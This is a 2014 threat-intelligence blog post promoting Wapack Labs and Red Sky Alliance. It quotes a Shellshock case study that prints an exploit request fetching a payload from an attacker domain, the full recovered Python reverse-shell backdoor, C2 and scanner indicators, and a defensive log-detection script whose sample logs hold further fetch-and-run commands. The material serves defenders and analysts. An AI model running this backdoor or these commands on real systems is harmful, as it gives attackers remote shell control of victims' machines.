At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"
So let's start here...
Wapack Labs is an intelligence, research and analysis company. We sell information.
- Wapack Labs authors, sources, and sells intelligence, research and analysis. We deliver it in many forms, to many places: Red Sky Alliance/Beadwindow, the FS-ISAC, subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pros. Discussions are deep, and at the end of the thread, members receive a finished report with analysis of the discussion.
- Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization -- that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
- For government security researchers we offer a second collaborative, Beadwindow, delivered in ThreatConnect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting to several government agencies directly, and for others we push material through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...
We published this report in its entirety last week.
We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)
We're looking for use cases we might help protect against. This is one of three case studies we'd identified of attackers taking advantage of Shellshock.
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
SHELLSHOCK CASE STUDY AND INFRASTRUCTURE

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE-2014-6271. The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September 29th. This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, it may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill chain into more targeted operations.
Legacy spamming infrastructure re-emerges with Shellshock

A recently observed instance of Shellshock in the wild took the form of a Python-implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:
Originating IPs:
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26

Shellshock request (truncated):
() { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm

Payload fetched by the request (cl.py), as recovered:

```python
#!/usr/bin/env python
# cl.py as recovered in the report: a Python 2 reverse shell. The process
# forks, the parent connects out to the C2 on TCP 9091 and runs every line it
# receives through the local shell, sending the output back. The forked child
# simply falls off the end of the script and exits.
from socket import *
import os
from time import sleep
import sys

# os.fork() exists only on POSIX; this call would fail on Windows.
fpid = os.fork()
if fpid!=0:
    host='stats.google-traffic-analytics.com'
    port=9091
    sockobj = None
    recv = False

    def connect():
        # Open a TCP connection to the C2; on any failure return False so the
        # caller keeps retrying once a second.
        try:
            sockobj=socket(AF_INET,SOCK_STREAM)
            sockobj.connect((host,port))
            return sockobj
        except:
            return False

    while True:
        while not sockobj:
            sockobj = connect()
            print "[*] Trying to reconnect..."
            sleep(1)
        if sockobj:
            recv = sockobj.recv(1024)
            #print recv
            # An empty read means the C2 closed the connection; the loop ends.
            if not recv: sockobj = False; break;
            cmd = recv.strip()
            # Execute the received line in a shell and return its stdout.
            res = os.popen(cmd).read()
            if res:
                sockobj.sendall(res)
```

Table 5. google-traffic-analytics.com Scanning Nodes

Whois records for google-traffic-analytics.com (the legacy record lists a registrant contact, the current record an admin contact):

| Field | Legacy Whois Record | Current Record |
|---|---|---|
| Contact type | Registrant | Admin |
| Name | Goga Gastoyan | Radovanka Janekovic |
| Organization | Goga Gastoyan | Goga Gastoyan |
| Email | bash@blogbuddy.ru | support@google-traffic-analytics.com |
| Phone | +7.4957452002 | +386.15765749 |
| Fax | +7.4957452002 | +386.15765749 |
| Street | Pokryshkina d.36 kv.36 | Ljubljanska 6 |
| City | Moscow | Bled |
| State/Province | Moscow | Bled |
| Postal Code | 119602 | 4260 |
| Country | ru | SI |
Upon successful exploitation, a curl request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple but effective backdoor. The report describes it as working on both Linux and Windows; note that the recovered code calls os.fork(), which is unavailable on Windows, so as written it only runs on Unix-like hosts. At the time of analysis it had zero detections on VirusTotal [1].

The configured C2 address is the subdomain stats.google-traffic-analytics.com. The downloaded script attempts a connection to the C2 on TCP port 9091 and, if the C2 is listening, opens a remote shell on the victim to the C2: every line received is run through the local shell and its output is sent back. During testing, the C2 node issued a single uname -a command, which prints the kernel name, hostname, kernel release and version, and hardware architecture of the system [2]. [Comment: No additional activity was observed.] (See the Mitigations section for a Snort signature.)

The re-emergence of this domain after an apparent four-year hiatus (it was reported as a spam C&C server in 2010 [3]) raises the question of whether it belongs to the same attackers. A Whois history report from DomainTools lists the registrant during 2010 as "Goga Gastoyan" (bash@blogbuddy.ru); this changed in 2013 to the current owner, "Radovanka Janekovic". Further inspection of the records, however, shows "Goga Gastoyan" retained as the Admin Organization in the new record, which points to the same operators. With that link to the legacy infrastructure established, this latest Shellshock activity may be the most recent attempt to expand the spamming network. Table 6 compares the two records.

Table 6. Whois Record Comparison
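The delivery chain above (a Shellshock header carrying a curl download of cl.py from the report's domain) is what a SOC analyst would hunt for in web server logs. The following detector is an added example written for this post, not code from the Wapack Labs report: it parses combined-format access log lines, flags any request field carrying the bash function-definition prefix "() {" that CVE-2014-6271 needs, extracts staged URLs from the trailing command, and checks the source IP and URL host against the indicators in Table 5 and the text (the domain google-traffic-analytics.com and the 19 scanning IPs). The log lines, the helper names (shellshock_command, is_ioc_host, analyze_log) and the second attacker address 203.0.113.99 are constructed for the demonstration.

```python
"""Shellshock (CVE-2014-6271) delivery detection over web server access logs.

Added example, not code from the Wapack Labs report. The indicators below
(domain, scanning IPs) are copied from the report's Table 5 and text; the
log lines, the helper names and the second attacker URL are constructed.
"""
import re
from urllib.parse import urlsplit

# Indicators from the report: the staging/C2 domain and the Table 5 source IPs.
IOC_DOMAIN = "google-traffic-analytics.com"
IOC_SCANNING_IPS = frozenset({
    "14.163.12.119", "77.29.189.34", "78.15.20.81", "78.161.195.166",
    "79.136.130.110", "88.253.229.151", "93.139.212.67", "109.227.100.189",
    "112.156.18.40", "113.171.116.163", "117.218.186.16", "118.172.123.111",
    "119.130.114.154", "124.123.75.68", "178.120.175.81", "178.121.79.68",
    "190.49.241.220", "190.82.114.190", "223.206.54.26",
})

# CVE-2014-6271: bash imports any environment variable whose value starts
# with "() {" as a function and keeps executing whatever follows the closing
# "};". CGI servers copy request headers into such variables, so the prefix
# shows up in User-Agent, Referer, Cookie or the request line itself.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<cmd>.*)")
URL_RE = re.compile(r"https?://[^\s'\"<>;|]+")

# Apache/nginx "combined" format:
# ip - - [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def shellshock_command(value):
    """Return the command that follows a Shellshock prefix in value, else None."""
    m = SHELLSHOCK_RE.search(value)
    return m.group("cmd").strip() if m else None


def is_ioc_host(url):
    """True when the URL host is the report's domain or one of its subdomains."""
    host = (urlsplit(url).hostname or "").lower()
    return host == IOC_DOMAIN or host.endswith("." + IOC_DOMAIN)


def analyze_log(lines):
    """Return one finding per log line that carries a Shellshock payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "agent"):
            cmd = shellshock_command(m.group(field))
            if cmd is None:
                continue
            urls = URL_RE.findall(cmd)
            findings.append({
                "ip": m.group("ip"),
                "field": field,
                "command": cmd,
                "urls": urls,
                "known_scanner": m.group("ip") in IOC_SCANNING_IPS,
                "known_domain": any(is_ioc_host(u) for u in urls),
            })
            break  # one finding per line is enough
    return findings


# Constructed sample log lines modelled on the request in Table 5.
SAMPLE_LOG = [
    '178.120.175.81 - - [27/Sep/2014:11:03:41 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update\'"',
    '198.51.100.7 - - [27/Sep/2014:11:04:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    '203.0.113.5 - - [28/Sep/2014:02:15:09 +0000] "GET /cgi-bin/status HTTP/1.0" 500 0 '
    '"() {:;}; /bin/bash -c \'wget -q http://203.0.113.99/x.sh -O /tmp/x; sh /tmp/x\'" "-"',
]

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

The prefix match is deliberately loose (any whitespace between "()", "{" and "};") because scanners varied the spacing, and a 500 response does not clear a hit: the CGI may have executed the payload before failing. Pair this with an egress rule or flow search for outbound TCP 9091 to stats.google-traffic-analytics.com, which is the C2 connection the recovered cl.py makes.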
[1] VirusTotal analysis of cl.py (SHA-256 052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d): https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] uname(1) manual page: http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] Sucuri blog, August 2010, on google-traffic-analytics.com as a spam C&C server: http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html
------------------------------------------------------
I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete, are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).
This week is, again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff